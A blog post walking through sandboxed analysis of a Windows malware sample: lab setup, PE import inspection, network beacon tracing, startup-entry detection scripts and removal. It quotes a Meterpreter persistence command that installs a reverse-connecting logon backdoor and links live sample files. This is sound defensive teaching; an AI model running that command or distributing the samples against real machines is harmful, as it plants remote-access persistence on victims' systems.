Thursday 28 January 2016

Just another Malware Analysis Guide (2) - Bigger Picture

Part 1 only did a quick check and removal of the malware. Part 2 performs further analysis on the same sample. Readers who want to go deeper into malware analysis can refer to Practical Malware Analysis and the Malware Analyst's Cookbook.

Tools used in this part 2:
VMware Player/ VMware Workstation
Oracle VirtualBox
Windows 7 32/64 bits ISO
Buster Sandbox Analyzer 1.88
Sandboxie 3.70
Wireshark
Sysinternals Suite (Process Explorer, Process Monitor, TCPView, Autoruns)
CFF Explorer
PeStudio
PEiD

The sandbox testing below was run on Sandboxie 3.70 with Buster Sandbox Analyzer 1.88.

===Environment Setup===
The environment setup below uses VMware Workstation and Windows 7 Ultimate 64-bit SP1. Give the VM a host-only network adapter (or none at all) so the sample cannot reach the Internet: the sample analysed below connects out to a remote host, and that traffic should stay inside the lab.
Create a new virtual machine

Select your Windows 7 iso

Configure your machine performance

After that just click Finish; the machine powers on automatically if "Power on this virtual machine after creation" is enabled.

Once Windows is installed, VMware Tools is installed automatically and the machine restarts.

# Install Wireshark
Just keep clicking Next until the installation finishes.

# Extract Buster Sandbox Analyzer (BSA)


# Install and configure Sandboxie

Configure Sandboxie.

Open the Sandboxie configuration file (Sandboxie.ini, via Sandboxie Control > Configure > Edit Configuration), add the following lines to the [DefaultBox] section and save. The two InjectDll lines make Sandboxie load BSA's API-logging DLL into every sandboxed process (32- and 64-bit), OpenWinClass lets the sandboxed logger talk to the BSA window, and NotifyDirectDiskAccess makes Sandboxie report attempts at direct (raw) disk access.
InjectDll=C:\Users\exploit\Downloads\bsa\LOG_API\LOG_API32.dll
InjectDll64=C:\Users\exploit\Downloads\bsa\LOG_API\LOG_API64.dll
OpenWinClass=TFormBSA
NotifyDirectDiskAccess=y
* Note: Replace the two InjectDll paths with the folder where you extracted Buster Sandbox Analyzer; the DLLs are in its LOG_API subfolder.

In BSA, set the sandbox folder to check to the Sandboxie sandbox location (by default C:\Sandbox\<username>\DefaultBox):

# Extract the Sysinternals Suite into a folder and add it to PATH
Start > Right-click Computer > Properties > Advanced system settings > Advanced tab > Environment Variables > Path > append the Sysinternals folder path (separated from the existing entries by a semicolon) > OK > OK > OK


Open CMD and run tcpview, autoruns, procexp and procmon once each; every tool shows a license agreement the first time it runs, just click Accept:

Go to your Sysinternals Suite folder, locate procexp.exe, Right-click > Properties > Compatibility tab > check "Run this program as an administrator":

In Process Explorer, View > Select Columns > enable DEP Status, ASLR Enabled, Verified Signer, and Network Sends and Receives.
The Network Sends and Receives columns are only populated when Process Explorer runs as Administrator, which is why the compatibility setting above matters.

With those columns enabled you can see at a glance which process is using the network.

# Install CFF Explorer

The screenshot above shows the libraries imported by calc.exe, as listed in CFF Explorer's Import Directory.

# Extract and run PeStudio

Take a snapshot of the virtual machine before proceeding, so you can revert to this clean, tool-equipped state after each run of the sample.
In VMware Workstation: VM tab > Snapshot > Take Snapshot

===Analyze the malware===
If you kept the sample from Part 1, drag and drop it (or copy and paste it) into the virtual machine. Once the sample is inside the machine, run it.

Open Process Explorer and look for a suspicious process with non-zero Network Sends or Receives.
Double-click the suspicious process to see more information about the running program, including the path of its image file.

Using the file location shown by Process Explorer, drag and drop the malware into PeStudio.


The imported libraries wsock32.dll and ws2_32.dll are the Winsock libraries used to open network connections, so the binary has networking capability.

Drag and drop the malware into CFF Explorer.


Drag and drop the malware into PEiD.

PEiD's signature scan reports a Base64 table in the binary, which indicates that the program carries or produces Base64-encoded data.

Open Sandboxie and Buster Sandbox Analyzer, then click Start Analysis in BSA.
It may prompt with "Delete Sandbox Folder contents and continue" and "Ignore Sandbox Folder contents and continue"; select Ignore Sandbox Folder contents and continue.
After Start Analysis, BSA waits for a program to be executed inside Sandboxie.

Now run the malicious file inside Sandboxie (right-click the file > Run Sandboxed, or drop it onto the Sandboxie Control window) and choose DefaultBox, the sandbox the InjectDll lines were added to.

The analysis result from BSA:

Note the outbound connection to IP address 192.168.0.128 on port 4433.
wsock32.dll, ws2_32.dll and wshtcpip.dll were loaded to make that network connection, matching the imports seen in PeStudio.
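The import-table check made twice above (in PeStudio, and again when BSA lists the Winsock DLLs) can be scripted. The Python below is an added example, not code from the original post or from any of the tools mentioned: it walks a PE file's import directory by hand (no pefile dependency), lists each imported DLL with its functions, and flags the DLLs that give a binary network capability. Because the actual sample is not on the page, the script builds a constructed minimal PE32 image containing only an import directory to run against; the NETWORK_DLLS list is this example's own assumption, not an exhaustive one.

```python
import struct

# Constructed input: a minimal PE32 file whose only content is an import directory,
# standing in for the real sample, which is not on the page.
def build_pe(imports):
    """Build a minimal PE32 image importing the given {dll: [function, ...]}."""
    sect_rva, sect_off = 0x1000, 0x200           # single section mapped at RVA 0x1000
    items = list(imports.items())
    descs = bytearray()                           # IMAGE_IMPORT_DESCRIPTOR array
    tail = bytearray()                            # strings and thunk arrays placed after it
    tail_base = 20 * (len(items) + 1)             # 20 bytes per descriptor + null terminator
    for dll, funcs in items:
        hint_rvas = []
        for f in funcs:                           # IMAGE_IMPORT_BY_NAME: hint(2) + name + NUL
            hint_rvas.append(sect_rva + tail_base + len(tail))
            tail += struct.pack('<H', 0) + f.encode() + b'\0'
        name_rva = sect_rva + tail_base + len(tail)
        tail += dll.encode() + b'\0'
        tail += b'\0' * (-len(tail) % 4)          # align the thunk array
        thunk_rva = sect_rva + tail_base + len(tail)
        tail += b''.join(struct.pack('<I', r) for r in hint_rvas) + bytes(4)
        descs += struct.pack('<IIIII', thunk_rva, 0, 0, name_rva, thunk_rva)
    descs += bytes(20)                            # terminating descriptor
    section = bytes(descs + tail)
    dos = b'MZ' + bytes(58) + struct.pack('<I', 0x40)                 # e_lfanew = 0x40
    coff = struct.pack('<HHIIIHH', 0x14C, 1, 0, 0, 0, 224, 0x102)     # i386, 1 section
    opt = bytearray(224)
    struct.pack_into('<H', opt, 0, 0x10B)                              # PE32 magic
    struct.pack_into('<I', opt, 92, 16)                                # NumberOfRvaAndSizes
    struct.pack_into('<II', opt, 96 + 8, sect_rva, len(descs))         # DataDirectory[1]: imports
    sect = struct.pack('<8sIIIIIIHHI', b'.idata', len(section), sect_rva,
                       len(section), sect_off, 0, 0, 0, 0, 0xC0000040)
    head = dos + b'PE\0\0' + coff + bytes(opt) + sect
    return head + bytes(sect_off - len(head)) + section

def parse_imports(data):
    """Walk the import directory of a PE32/PE32+ file: {dll: [function or '#ordinal']}."""
    pe = struct.unpack_from('<I', data, 0x3C)[0]                       # e_lfanew
    if data[:2] != b'MZ' or data[pe:pe + 4] != b'PE\0\0':
        raise ValueError('not a PE file')
    nsect, opt_size = struct.unpack_from('<H', data, pe + 6)[0], struct.unpack_from('<H', data, pe + 20)[0]
    opt = pe + 24
    magic = struct.unpack_from('<H', data, opt)[0]
    if magic == 0x10B:                            # PE32: directories at +96, 32-bit thunks
        dd, thunk_fmt, ord_flag = 96, '<I', 1 << 31
    elif magic == 0x20B:                          # PE32+: directories at +112, 64-bit thunks
        dd, thunk_fmt, ord_flag = 112, '<Q', 1 << 63
    else:
        raise ValueError('unknown optional header magic %#x' % magic)
    if struct.unpack_from('<I', data, opt + dd - 4)[0] < 2:            # NumberOfRvaAndSizes
        return {}
    imp_rva = struct.unpack_from('<I', data, opt + dd + 8)[0]          # import table RVA
    if imp_rva == 0:
        return {}                                 # no import table (e.g. a packed stub)
    # (VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData) per section header
    sections = [struct.unpack_from('<IIII', data, opt + opt_size + 40 * i + 8) for i in range(nsect)]

    def rva2off(rva):                             # RVA -> file offset via the section table
        for vsize, vaddr, rsize, raw in sections:
            if vaddr <= rva < vaddr + max(vsize, rsize):
                return raw + (rva - vaddr)
        raise ValueError('RVA %#x outside every section' % rva)

    def cstr(off):
        return data[off:data.index(b'\0', off)].decode('ascii', 'replace')

    result, desc = {}, rva2off(imp_rva)
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from('<IIIII', data, desc)
        if name_rva == 0:
            break
        funcs, thunk = [], rva2off(oft or ft)     # prefer the INT; some packers zero it
        while True:
            entry = struct.unpack_from(thunk_fmt, data, thunk)[0]
            if entry == 0:
                break
            funcs.append('#%d' % (entry & 0xFFFF) if entry & ord_flag
                         else cstr(rva2off(entry) + 2))   # skip the 2-byte hint
            thunk += struct.calcsize(thunk_fmt)
        result[cstr(rva2off(name_rva))] = funcs
        desc += 20
    return result

# DLLs whose presence in the import table means the binary can talk to the network.
# This list is an assumption of the example, not an exhaustive one.
NETWORK_DLLS = {'ws2_32.dll', 'wsock32.dll', 'wshtcpip.dll', 'wininet.dll',
                'winhttp.dll', 'urlmon.dll', 'dnsapi.dll'}

def network_capable(imports):
    """Imported DLLs that give the binary network capability, sorted."""
    return sorted(d for d in imports if d.lower() in NETWORK_DLLS)

SAMPLE = build_pe({'KERNEL32.dll': ['CreateFileA', 'WriteFile'],
                   'WS2_32.dll': ['WSAStartup', 'socket', 'connect', 'send', 'recv'],
                   'wsock32.dll': ['gethostbyname']})

if __name__ == '__main__':
    for dll, funcs in parse_imports(SAMPLE).items():
        print(dll, 'NETWORK' if dll.lower() in NETWORK_DLLS else '', ', '.join(funcs))
```

To run it against a real file, replace SAMPLE with open(path, 'rb').read(). An empty or KERNEL32-only import table on a binary that still opens sockets is itself a finding: it means the program resolves its imports at run time (LoadLibrary/GetProcAddress) or is packed, which is where the dynamic trace from BSA takes over from static inspection.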

Notice that the malicious file lives in the Temp folder. How does it start by itself? Recall from Part 1 that the wmic command can list every startup program:

C:\> wmic startup list full > startup.txt


A suspicious Visual Basic script (.vbs) is registered as a startup entry.
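Reading startup.txt by eye works for one machine. As an added example (not from the original post), the Python below parses the output of wmic startup list full and applies the heuristics this walkthrough uses to spot the entry: an autorun whose command lives in a user-writable folder such as Temp or AppData, is launched through a script host like wscript.exe, or points at a script file rather than an installed program. The sample records are constructed (a benign VMware Tools entry and a Temp .vbs entry resembling the one found here), encoded the way wmic writes them when redirected to a file (UTF-16LE with BOM and CR CR LF line endings); the three regexes are this example's own heuristics and need tuning for your environment, since rundll32 and powershell also appear in legitimate entries.

```python
import re

def parse_wmic_list_full(raw):
    """Parse `wmic <class> list full` output into a list of {property: value} records.

    When redirected to a file, wmic writes UTF-16LE with a BOM and ends lines with
    CR CR LF, so blank lines are not a reliable record separator; instead a new
    record starts whenever a property name repeats.
    """
    if isinstance(raw, bytes):
        raw = raw.decode('utf-16') if raw.startswith(b'\xff\xfe') else raw.decode('utf-8', 'replace')
    records, cur = [], {}
    for line in raw.splitlines():
        line = line.strip()
        if '=' not in line:
            continue                       # blank lines and stray CRs
        key, _, value = line.partition('=')
        if key in cur:                     # wmic prints properties in a fixed order per record
            records.append(cur)
            cur = {}
        cur[key] = value
    if cur:
        records.append(cur)
    return records

# Heuristics of this example (assumptions, not rules from the post): persistence
# that runs from a user-writable folder, goes through a script host or LOLBin,
# or points at a script rather than an installed program.
USER_WRITABLE = re.compile(r'\\(Temp|AppData|ProgramData|Users\\Public|Downloads)\\', re.I)
SCRIPT_HOST = re.compile(r'\b(wscript|cscript|mshta|powershell|regsvr32|rundll32)(\.exe)?\b', re.I)
SCRIPT_EXT = re.compile(r'\.(vbs|vbe|js|jse|wsf|hta|ps1)\b', re.I)

def suspicious_startup(records):
    """Return [(Name, Location, [reasons])] for startup entries matching the heuristics."""
    hits = []
    for rec in records:
        cmd = rec.get('Command', '')
        reasons = []
        if USER_WRITABLE.search(cmd):
            reasons.append('command runs from a user-writable directory')
        if SCRIPT_HOST.search(cmd):
            reasons.append('launched through a script host or LOLBin')
        if SCRIPT_EXT.search(cmd):
            reasons.append('target is a script file, not an installed program')
        if reasons:
            hits.append((rec.get('Name', '?'), rec.get('Location', '?'), reasons))
    return hits

# Constructed startup.txt: a benign VMware Tools entry and a Temp .vbs autorun like
# the one found above, encoded the way wmic writes it (UTF-16LE + BOM, CR CR LF).
# The SID and user name are placeholders.
SAMPLE_LINES = [
    '',
    'Caption=VMware User Process',
    'Command="C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" -n vmusr',
    'Description=VMware User Process',
    'Location=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run',
    'Name=VMware User Process',
    'SettingID=',
    'User=Public',
    '',
    '',
    'Caption=persist',
    'Command=wscript.exe "C:\\Users\\exploit\\AppData\\Local\\Temp\\persist.vbs"',
    'Description=persist',
    'Location=HKU\\S-1-5-21-1111111111-2222222222-3333333333-1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run',
    'Name=persist',
    'SettingID=',
    'User=WIN7-LAB\\exploit',
    '',
]
SAMPLE_BYTES = b'\xff\xfe' + '\r\r\n'.join(SAMPLE_LINES).encode('utf-16-le')

if __name__ == '__main__':
    for name, location, reasons in suspicious_startup(parse_wmic_list_full(SAMPLE_BYTES)):
        print('%s (%s)\n  - %s' % (name, location, '\n  - '.join(reasons)))
```

To use it on the real file, pass open('startup.txt', 'rb').read() to parse_wmic_list_full. Keep the Location column in the output: it tells you which Run key (HKLM versus a per-user HKU hive) to clean in the removal step, and per-user persistence is what Part 1's removal instructions target.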

Open the .vbs in a text editor. The source has been obfuscated with random identifiers, but that does not matter much: the script's intent is still readable.
It uses WScript.Shell to execute the malicious EXE file.

Spot the wscript.exe process in Process Explorer:

Terminate it with Right-click > Kill Process Tree, or press Shift+Delete with the process selected (Delete alone kills only the selected process, not its children).

Once the process is stopped, it is safe to remove the registry value, the .vbs and the executable. Refer to Part 1 for how to remove the registry key and value.


* Note: If you are familiar with Metasploit, you will recognise the EXE and VBS as the output of the Meterpreter persistence script, run persistence -U -i 5 -p 4433 -r 192.168.0.128: -U installs the VBS under the current user's Run key so it starts at logon, -i 5 makes it retry every 5 seconds, and -p 4433 -r 192.168.0.128 are the handler port and address, which is exactly the connection BSA recorded.
Sample files: EXE VBS
Password: infected

End of Just another Malware Analysis Guide (2) - Bigger Picture
